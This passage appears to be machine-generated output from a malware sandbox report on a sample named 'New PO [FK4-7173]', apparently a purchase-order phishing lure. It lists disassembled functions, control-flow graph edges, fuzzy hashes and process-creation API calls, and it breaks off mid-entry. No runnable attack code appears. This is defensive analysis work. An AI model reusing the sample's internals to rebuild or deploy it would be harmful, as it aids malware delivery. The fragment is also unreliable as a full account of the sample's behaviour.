                                                                          • Instruction Fuzzy Hash: 64127CB0A006098FCB54CF69D984AAEBBF2FF88714F558659E805DB361DB31ED41CB50
                                                                          Function 07055E27 Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 769 7055e27-7055e4d 770 7055e53-7055e76 769->770 771 705627c-7056280 769->771 780 7055f24-7055f28 770->780 781 7055e7c-7055e89 770->781 772 7056282-7056296 771->772 773 7056299-70562a7 771->773 777 70562a9-70562be 773->777 778 7056318-705632d 773->778 789 70562c5-70562d2 777->789 790 70562c0-70562c3 777->790 791 7056334-7056341 778->791 792 705632f-7056332 778->792 784 7055f70-7055f79 780->784 785 7055f2a-7055f38 780->785 793 7055e98 781->793 794 7055e8b-7055e96 781->794 787 705638f 784->787 788 7055f7f-7055f89 784->788 785->784 804 7055f3a-7055f55 785->804 801 7056394-70563ae 787->801 788->771 795 7055f8f-7055f98 788->795 796 70562d4-7056315 789->796 790->796 797 7056343-705637e 791->797 792->797 805 7055e9a-7055e9c 793->805 794->805 799 7055fa7-7055fb3 795->799 800 7055f9a-7055f9f 795->800 841 7056385-705638c 797->841 799->801 808 7055fb9-7055fbf 799->808 800->799 826 7055f57-7055f61 804->826 827 7055f63 804->827 805->780 807 7055ea2-7055f04 805->807 851 7055f06 807->851 852 7055f0a-7055f21 807->852 812 7055fc5-7055fd5 808->812 813 7056266-705626a 808->813 824 7055fd7-7055fe7 812->824 825 7055fe9-7055feb 812->825 813->787 816 7056270-7056276 813->816 816->771 816->795 828 7055fee-7055ff4 824->828 825->828 829 7055f65-7055f67 826->829 827->829 828->813 832 7055ffa-7056009 828->832 829->784 835 7055f69 829->835 837 70560b7-70560e2 call 7055c60 * 2 832->837 838 705600f 832->838 835->784 855 70561cc-70561e6 837->855 856 70560e8-70560ec 837->856 840 7056012-7056023 838->840 840->801 844 7056029-705603b 840->844 844->801 846 7056041-7056059 844->846 909 705605b call 7056800 846->909 910 705605b call 70567ff 846->910 850 7056061-7056071 850->813 854 7056077-705607a 850->854 851->852 852->780 857 7056084-7056087 854->857 858 705607c-7056082 854->858 855->771 876 70561ec-70561f0 855->876 856->813 860 70560f2-70560f6 856->860 857->787 861 705608d-7056090 857->861 858->857 858->861 863 705611e-7056124 860->863 864 70560f8-7056105 860->864 865 7056092-7056096 861->865 866 7056098-705609b 861->866 867 7056126-705612a 863->867 868 705615f-7056165 863->868 881 7056114 864->881 882 7056107-7056112 864->882 865->866 869 70560a1-70560a5 865->869 866->787 866->869 867->868 874 705612c-7056135 867->874 872 7056167-705616b 868->872 873 7056171-7056177 868->873 869->787 870 70560ab-70560b1 869->870 870->837 870->840 872->841 872->873 877 7056183-7056185 873->877 878 7056179-705617d 873->878 879 7056144-705615a 874->879 880 7056137-705613c 874->880 883 70561f2-70561fc call 7054b10 876->883 884 705622c-7056230 876->884 885 7056187-7056190 877->885 886 70561ba-70561bc 877->886 878->813 878->877 879->813 880->879 887 7056116-7056118 881->887 882->887 883->884 897 70561fe-7056213 883->897 884->841 888 7056236-705623a 884->888 890 7056192-7056197 885->890 891 705619f-70561b5 885->891 886->813 893 70561c2-70561c9 886->893 887->813 887->863 888->841 895 7056240-705624d 888->895 890->891 891->813 900 705625c 895->900 901 705624f-705625a 895->901 897->884 906 7056215-705622a 897->906 903 705625e-7056260 900->903 901->903 903->813 903->841 906->771 906->884 909->850 910->850
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq$(ocq$(ocq
                                                                          • API String ID: 0-2003149739
                                                                          • Opcode ID: d4e31e966256ee21e4e5a0d930a59f0f008e4cd9e8b02af7422401c824ad8c6c
                                                                          • Instruction ID: 7a01765b627056386d0bff71cc8b04a9a60b97df551fd08900fdb23fc64f59cc
                                                                          • Opcode Fuzzy Hash: d4e31e966256ee21e4e5a0d930a59f0f008e4cd9e8b02af7422401c824ad8c6c
                                                                          • Instruction Fuzzy Hash: 32C128B0A006099FCB54CFA9C984AAEBBF2FF88714F558659E815AB361D731ED40CB50
                                                                          Function 07059A58 Relevance: 2.9, Strings: 2, Instructions: 370COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1265 7059a58-7059a83 1266 7059a8a-7059a8c 1265->1266 1267 7059a85 call 70563b0 1265->1267 1268 7059aa0-7059aa2 1266->1268 1269 7059a8e-7059a9e 1266->1269 1267->1266 1270 7059aa5-7059ab0 call 70563b0 1268->1270 1269->1270 1274 7059ac4-7059ac6 1270->1274 1275 7059ab2-7059ac2 1270->1275 1276 7059ac9-7059add 1274->1276 1275->1276 1278 7059ae3 1276->1278 1279 7059cc2-7059ccb 1276->1279 1280 7059ae6-7059aec 1278->1280 1281 7059cd1-7059d00 1279->1281 1282 7059e8e-7059e94 1279->1282 1283 7059ef2-7059ef7 1280->1283 1284 7059af2-7059b03 call 7059328 1280->1284 1305 7059eb7-7059eeb 1281->1305 1306 7059d06-7059d08 1281->1306 1285 7059e96-7059e98 1282->1285 1286 7059e9a-7059ea0 1282->1286 1294 7059b09 1284->1294 1295 7059c58-7059c5e 1284->1295 1289 7059ea8-7059eaf 1285->1289 1290 7059ea6 1286->1290 1291 7059ea2-7059ea4 1286->1291 1290->1289 1291->1289 1299 7059da7-7059db0 1294->1299 1300 7059b10-7059b19 1294->1300 1301 7059e13-7059e1c 1294->1301 1302 7059c0c-7059c15 1294->1302 1303 7059d38-7059d41 1294->1303 1304 7059b8a-7059b93 1294->1304 1297 7059c60-7059c66 1295->1297 1298 7059c68-7059c6e 1295->1298 1297->1298 1307 7059c78-7059c7a 1297->1307 1309 7059c70-7059c76 1298->1309 1310 7059c7f-7059c85 1298->1310 1299->1283 1315 7059db6-7059dc3 1299->1315 1300->1283 1313 7059b1f-7059b2c 1300->1313 1301->1283 1311 7059e22-7059e37 1301->1311 1302->1283 1316 7059c1b-7059c33 1302->1316 1303->1283 1312 7059d47-7059d54 1303->1312 1304->1283 1308 7059b99-7059bae 1304->1308 1305->1283 1306->1305 1314 7059d0e-7059d14 1306->1314 1307->1289 1308->1283 1340 7059bb4-7059bc8 1308->1340 1309->1307 1309->1310 1322 7059c87-7059c8d 1310->1322 1323 7059c96-7059c9c 1310->1323 1311->1283 1318 7059e3d-7059e54 call 7056800 1311->1318 1312->1283 1319 7059d5a-7059d6a 1312->1319 1313->1283 1320 7059b32-7059b49 1313->1320 1314->1283 1321 7059d1a-7059d2b call 7059328 1314->1321 1315->1283 1324 7059dc9-7059dd9 1315->1324 1316->1283 1325 7059c39-7059c53 call 7056800 1316->1325 1341 7059e59-7059e5f 1318->1341 1319->1283 1328 7059d70-7059d81 1319->1328 1320->1283 1329 7059b4f-7059b61 1320->1329 1321->1341 1349 7059d31 1321->1349 1331 7059c93 1322->1331 1332 7059eb2 1322->1332 1335 7059cad-7059cb0 1323->1335 1336 7059c9e-7059ca4 1323->1336 1324->1283 1333 7059ddf-7059df0 1324->1333 1325->1295 1328->1283 1342 7059d87-7059da2 1328->1342 1329->1283 1343 7059b67-7059b85 1329->1343 1331->1323 1332->1305 1333->1283 1345 7059df6-7059e11 1333->1345 1335->1332 1339 7059cb6-7059cbc 1335->1339 1336->1332 1337 7059caa 1336->1337 1337->1335 1339->1279 1339->1280 1340->1283 1346 7059bce-7059be3 1340->1346 1347 7059e61-7059e67 1341->1347 1348 7059e69-7059e6f 1341->1348 1342->1341 1343->1295 1345->1341 1346->1283 1360 7059be9-7059c0a 1346->1360 1347->1348 1352 7059e79-7059e7b 1347->1352 1353 7059e71-7059e77 1348->1353 1354 7059e7d-7059e80 1348->1354 1349->1299 1349->1301 1349->1303 1352->1289 1353->1352 1353->1354 1354->1332 1357 7059e82-7059e88 1354->1357 1357->1281 1357->1282 1360->1295
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq
                                                                          • API String ID: 0-3612734936
                                                                          • Opcode ID: 1a8eef3ad94e4d74b34d6c8c545130194a80b1503eaaccc1095caab010d82885
                                                                          • Instruction ID: 67cd2de1d74d8fb2c47a3184da40bb8d3962278d3fb700cd171eda8f13ea23fa
                                                                          • Opcode Fuzzy Hash: 1a8eef3ad94e4d74b34d6c8c545130194a80b1503eaaccc1095caab010d82885
                                                                          • Instruction Fuzzy Hash: 09F1F3B0A1411ADFCB15CF99C580DAFBBF6FB88300B15C659E9559B6A0C734F841CB90
                                                                          Function 07054668 Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1363 7054668-705468a 1364 70546a0-70546ab 1363->1364 1365 705468c-7054690 1363->1365 1366 70546b1-70546b3 1364->1366 1367 7054753-705477f 1364->1367 1368 7054692-705469e 1365->1368 1369 70546b8-70546bf 1365->1369 1370 705474b-7054750 1366->1370 1375 7054786-70547c2 1367->1375 1368->1364 1368->1369 1371 70546c1-70546c8 1369->1371 1372 70546df-70546e8 1369->1372 1371->1372 1373 70546ca-70546d5 1371->1373 1448 70546ea call 7054667 1372->1448 1449 70546ea call 7054658 1372->1449 1450 70546ea call 7054668 1372->1450 1373->1375 1376 70546db-70546dd 1373->1376 1395 70547c4-70547c6 1375->1395 1396 70547c8-70547ca 1375->1396 1376->1370 1377 70546f0-70546f2 1379 70546f4-70546f8 1377->1379 1380 70546fa-7054702 1377->1380 1379->1380 1381 7054715-7054726 1379->1381 1382 7054704-7054709 1380->1382 1383 7054711-7054713 1380->1383 1451 7054729 call 70550c8 1381->1451 1452 7054729 call 70550d8 1381->1452 1382->1383 1383->1370 1386 705472f-7054734 1389 7054736-7054741 call 7059f18 1386->1389 1390 7054749 1386->1390 1392 7054747 1389->1392 1390->1370 1392->1370 1395->1396 1397 70547d0-70547de 1396->1397 1398 70547cc-70547cf 1396->1398 1399 70547e0-70547e6 1397->1399 1400 70547ed-70547ff 1397->1400 1398->1397 1399->1400 1402 7054805-7054809 1400->1402 1403 7054893-7054895 1400->1403 1404 7054819-7054826 1402->1404 1405 705480b-7054817 1402->1405 1446 7054897 call 7054a21 1403->1446 1447 7054897 call 7054a30 1403->1447 1411 7054828-7054832 1404->1411 1405->1411 1406 705489d-70548a3 1409 70548a5-70548ab 1406->1409 1410 70548af-70548b6 1406->1410 1412 7054911-7054970 1409->1412 1413 70548ad 1409->1413 1416 7054834-7054843 1411->1416 1417 705485f-7054863 1411->1417 1425 7054977-705498e 1412->1425 1413->1410 1428 7054845-705484c 1416->1428 1429 7054853-705485d 1416->1429 1418 7054865-705486b 1417->1418 1419 705486f-7054873 1417->1419 1421 705486d 1418->1421 1422 70548b9-705490a 1418->1422 1419->1410 1423 7054875-7054879 1419->1423 1421->1410 1422->1412 1423->1425 1426 705487f-7054891 1423->1426 1426->1410 1428->1429 1429->1417 1446->1406 1447->1406 1448->1377 1449->1377 1450->1377 1451->1386 1452->1386
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Hgq$Hgq
                                                                          • API String ID: 0-3391890871
                                                                          • Opcode ID: 9c3c42fb33b4e4bae08f2a6bb2ecbd55d21b761a71ff6a6e493c22d2e1a259f0
                                                                          • Instruction ID: 51bac274e89f670dfcfffb93798d8f08b7fb0a636659f0119dcab9b5f5337330
                                                                          • Opcode Fuzzy Hash: 9c3c42fb33b4e4bae08f2a6bb2ecbd55d21b761a71ff6a6e493c22d2e1a259f0
                                                                          • Instruction Fuzzy Hash: 0491BFB57042959FDB159F288858BBE7BE2FB89300F048669E8058B395DB38CC85C791
                                                                          Function 07054BC8 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1454 7054bc8-7054bd5 1455 7054bd7-7054bdb 1454->1455 1456 7054bdd-7054bdf 1454->1456 1455->1456 1457 7054be4-7054bef 1455->1457 1458 7054df0-7054df7 1456->1458 1459 7054bf5-7054bfc 1457->1459 1460 7054df8 1457->1460 1461 7054d91-7054d97 1459->1461 1462 7054c02-7054c11 1459->1462 1464 7054dfd-7054e0a 1460->1464 1465 7054d9d-7054da1 1461->1465 1466 7054d99-7054d9b 1461->1466 1463 7054c17-7054c26 1462->1463 1462->1464 1472 7054c28-7054c2b 1463->1472 1473 7054c3b-7054c3e 1463->1473 1475 7054e10-7054e12 1464->1475 1476 7054e0c-7054e0e 1464->1476 1467 7054da3-7054da9 1465->1467 1468 7054dee 1465->1468 1466->1458 1467->1460 1470 7054dab-7054dae 1467->1470 1468->1458 1470->1460 1474 7054db0-7054dc5 1470->1474 1479 7054c2d-7054c30 1472->1479 1480 7054c4a-7054c50 1472->1480 1473->1480 1481 7054c40-7054c43 1473->1481 1490 7054dc7-7054dcd 1474->1490 1491 7054de9-7054dec 1474->1491 1477 7054e14-7054e17 1475->1477 1478 7054e18-7054e35 1475->1478 1476->1475 1477->1478 1503 7054e37-7054e3c 1478->1503 1504 7054e3e-7054e42 1478->1504 1487 7054c36 1479->1487 1488 7054d31-7054d37 1479->1488 1485 7054c52-7054c58 1480->1485 1486 7054c68-7054c85 1480->1486 1482 7054c45 1481->1482 1483 7054c96-7054c9c 1481->1483 1489 7054d5c-7054d69 1482->1489 1497 7054cb4-7054cc6 1483->1497 1498 7054c9e-7054ca4 1483->1498 1492 7054c5c-7054c66 1485->1492 1493 7054c5a 1485->1493 1531 7054c8e-7054c91 1486->1531 1487->1489 1495 7054d4f-7054d59 1488->1495 1496 7054d39-7054d3f 1488->1496 1515 7054d7d-7054d7f 1489->1515 1516 7054d6b-7054d6f 1489->1516 1501 7054ddf-7054de2 1490->1501 1502 7054dcf-7054ddd 1490->1502 1491->1458 1492->1486 1493->1486 1495->1489 1506 7054d41 1496->1506 1507 7054d43-7054d4d 1496->1507 1518 7054cd6-7054cf9 1497->1518 1519 7054cc8-7054cd4 1497->1519 1499 7054ca6 1498->1499 1500 7054ca8-7054cb2 1498->1500 1499->1497 1500->1497 1501->1460 1508 7054de4-7054de7 1501->1508 1502->1460 1502->1501 1512 7054e48-7054e4a 1503->1512 1504->1512 1506->1495 1507->1495 1508->1490 1508->1491 1520 7054e4c-7054e5e 1512->1520 1521 7054e5f-7054e66 1512->1521 1525 7054d83-7054d86 1515->1525 1516->1515 1524 7054d71-7054d75 1516->1524 1518->1460 1535 7054cff-7054d02 1518->1535 1532 7054d21-7054d2f 1519->1532 1524->1460 1526 7054d7b 1524->1526 1525->1460 1527 7054d88-7054d8b 1525->1527 1526->1525 1527->1461 1527->1462 1531->1489 1532->1489 1535->1460 1536 7054d08-7054d1a 1535->1536 1536->1532
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,gq$,gq
                                                                          • API String ID: 0-2533611571
                                                                          • Opcode ID: b6be6d5c863d8432d772c47b30c43ca01c14df6fd800222bca935c1deaafff7b
                                                                          • Instruction ID: e7424b43162c0bc1c7fdbce16305fd2a26438e3379e0ef5fd7fab6b98b8b8a56
                                                                          • Opcode Fuzzy Hash: b6be6d5c863d8432d772c47b30c43ca01c14df6fd800222bca935c1deaafff7b
                                                                          • Instruction Fuzzy Hash: EB9161B4A001469FCB98CF69C4849EFBBF1FF89204B158265E816DB365D731E881CB61
                                                                          Function 04B71CA4 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1580 4b71ca4-4b72471 1604 4b72474 call 4b72e98 1580->1604 1605 4b72474 call 4b72e88 1580->1605 1587 4b7247a-4b72493 1591 4b724f5-4b725da call 4b71cd4 call 4b71ce4 1587->1591 1592 4b72495-4b724ed 1587->1592 1592->1591 1604->1587 1605->1587
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $
                                                                          • API String ID: 0-227171996
                                                                          • Opcode ID: 66eb6b8dbda1a1afb48c7c4f128456309c87de3367f361d72559622ed5a70c42
                                                                          • Instruction ID: 41015f80e018f5bdb7785fcfe3bbb7a27e8dd49988797fd82b02f28178af5248
                                                                          • Opcode Fuzzy Hash: 66eb6b8dbda1a1afb48c7c4f128456309c87de3367f361d72559622ed5a70c42
                                                                          • Instruction Fuzzy Hash: 8071BF31910601CFFB04EF28D484A54B7B1FF99304B50C6A8D949AF326EB35F98ACB80
                                                                          Function 04B72361 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1606 4b72361-4b72459 1610 4b72465-4b72471 1606->1610 1628 4b72474 call 4b72e98 1610->1628 1629 4b72474 call 4b72e88 1610->1629 1611 4b7247a-4b72493 1615 4b724f5-4b725da call 4b71cd4 call 4b71ce4 1611->1615 1616 4b72495-4b724ed 1611->1616 1616->1615 1628->1611 1629->1611
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $
                                                                          • API String ID: 0-227171996
                                                                          • Opcode ID: e37b02e1f5bdbf741cc59151b463297447edc30f3819c9798c7c8eb518c1cb74
                                                                          • Instruction ID: 4fe9c393e76147b8cb172b63119c6adaeb5d943e3ff26c9f366b8a594e3cf0ee
                                                                          • Opcode Fuzzy Hash: e37b02e1f5bdbf741cc59151b463297447edc30f3819c9798c7c8eb518c1cb74
                                                                          • Instruction Fuzzy Hash: 0071AE35910701CFFB05EF28D484A54B7B1FF95304B4186A8D949AF326EB35F98ACB80
                                                                          Function 0705B0B8 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1630 705b0b8-705b0db 1631 705b0e2-705b1a1 1630->1631 1632 705b0dd 1630->1632 1640 705b1de-705b1e2 1631->1640 1632->1631 1641 705b1e4-705b254 1640->1641 1642 705b1a3-705b1db 1640->1642 1650 705b256 call 705c057 1641->1650 1651 705b256 call 705c058 1641->1651 1642->1640 1649 705b25c-705b266 1650->1649 1651->1649
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Tecq$Tecq
                                                                          • API String ID: 0-2088518435
                                                                          • Opcode ID: 91e83f207284d237ef63829320cd288c177fc917b3344f66201abfd9bc59d8c2
                                                                          • Instruction ID: b56143733d0e1f98d7bc794efc56d01553bab37303576cab41a66543431fb9e7
                                                                          • Opcode Fuzzy Hash: 91e83f207284d237ef63829320cd288c177fc917b3344f66201abfd9bc59d8c2
                                                                          • Instruction Fuzzy Hash: CD5197B4E006199FDB08DFA9C984AAEFBF2FF88301F10812AE915A7354DB756905CF50
                                                                          Function 0705B0B7 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Tecq$Tecq
                                                                          • API String ID: 0-2088518435
                                                                          • Opcode ID: 0cb10cf08080182f375eeb40f504e756943a049263a94e5518c5539deec6fe75
                                                                          • Instruction ID: f5e15937b2c2d2186044956fc8dafee84351c682564ecbd159cf887544c014d1
                                                                          • Opcode Fuzzy Hash: 0cb10cf08080182f375eeb40f504e756943a049263a94e5518c5539deec6fe75
                                                                          • Instruction Fuzzy Hash: 7051CCB4E006189FDB08DFE9D944A9EFBB2FF88301F10812AD915AB354DB755906CF50
                                                                          Function 04B76810 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Hgq$Hgq
                                                                          • API String ID: 0-3391890871
                                                                          • Opcode ID: ab171584ff28cf0a2a46e63b33b8296c377e0feb9910acc597d0f87275754ecc
                                                                          • Instruction ID: 35b1152ba3b54e2696f073bf6e1e6e98877664225046a2e961691b867f8da81f
                                                                          • Opcode Fuzzy Hash: ab171584ff28cf0a2a46e63b33b8296c377e0feb9910acc597d0f87275754ecc
                                                                          • Instruction Fuzzy Hash: 0C41C070B002198FDB09AF7C88605AE7BB6EFC9200B14446AD406EB395EF349D0587A2
                                                                          Function 07057620 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $cq$$cq
                                                                          • API String ID: 0-2695052418
                                                                          • Opcode ID: d0bf7f7a45eacb561b1751f264c83f7f11a791198a66bd3d7db4410f554b6750
                                                                          • Instruction ID: 48a2a9c1f84ad433c5da377629d2c3a896b1733609cbe4838bfb1a027192fbdc
                                                                          • Opcode Fuzzy Hash: d0bf7f7a45eacb561b1751f264c83f7f11a791198a66bd3d7db4410f554b6750
                                                                          • Instruction Fuzzy Hash: CD31C7F43042964FCB29DB29E85463F7BA5FF85340B246A9AD811CB296DB24CC40D791
                                                                          Function 05138DCC Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0513900E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 1e69341bb206dfc85180fdf76d1a46aecf6921534aca5aa5500615ad2f5f7863
                                                                          • Instruction ID: 0438d4ed1cb9fe49924fe5da5901cf64239bf31da7e35ff6bedbb20c6adbece1
                                                                          • Opcode Fuzzy Hash: 1e69341bb206dfc85180fdf76d1a46aecf6921534aca5aa5500615ad2f5f7863
                                                                          • Instruction Fuzzy Hash: F5A15A71D00219DFEB20CF68CC55BEDBBB2BF48314F1481A9E809A7280DB749985CF92
                                                                          Function 05138DD8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0513900E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: e6fdea824de9da5c16757723dad5190d48d459c074b38a344da1bdf0c7025b76
                                                                          • Instruction ID: e056055f0629e05155eb5ae1fcdfa38e0fd18392dc6eb2eaeefc9c41347b4bce
                                                                          • Opcode Fuzzy Hash: e6fdea824de9da5c16757723dad5190d48d459c074b38a344da1bdf0c7025b76
                                                                          • Instruction Fuzzy Hash: 30915B71D00219DFEF20CF68C955BEDBBB2BF48314F1481A9E809A7280DB749985CF91
                                                                          Function 07058BB0 Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq
                                                                          • API String ID: 0-1855696158
                                                                          • Opcode ID: 66775de849ea1e154ca9575b240285a04a88e0b3c199a79ef3d5fc0518b69899
                                                                          • Instruction ID: b0f4e89316e4df8de394b9ec4f98b6e87a5cd80930af6d6190a3e68483ab9832
                                                                          • Opcode Fuzzy Hash: 66775de849ea1e154ca9575b240285a04a88e0b3c199a79ef3d5fc0518b69899
                                                                          • Instruction Fuzzy Hash: C6022AB4610116DFCB14CF68C988AAFBBF2BF88304F158655E81A9B391C734F981CB59
                                                                          Function 04B43EC4 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B43FE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 4557144bd6fe70428bf19ac7dece1a1731d3253e73cc98e6b67cd5203d5c5a80
                                                                          • Instruction ID: f0d001018570aa2bcf1bdef0292cab3496d056aea110a2af10273bf4a61c03db
                                                                          • Opcode Fuzzy Hash: 4557144bd6fe70428bf19ac7dece1a1731d3253e73cc98e6b67cd5203d5c5a80
                                                                          • Instruction Fuzzy Hash: B951EEB1D003099FDB14CFA9C884ADEBBF5FF88310F24812AE818AB210D771A845CF91
                                                                          Function 04B42C70 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B43FE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 72496949c42f491deae9183f70cf0cbd4b06d3a16c9802fdbcb99973507c1426
                                                                          • Instruction ID: dbcfb0c782a178b644fe080b41667b35f66b79864c273c3b83b3d0f6080170b2
                                                                          • Opcode Fuzzy Hash: 72496949c42f491deae9183f70cf0cbd4b06d3a16c9802fdbcb99973507c1426
                                                                          • Instruction Fuzzy Hash: 3651E0B1D003099FDB14CF99C884ADEBBF5FF88300F64816AE818AB210D770A841CF91
                                                                          Function 04B42DC4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B46561
                                                                          Memory Dump Source
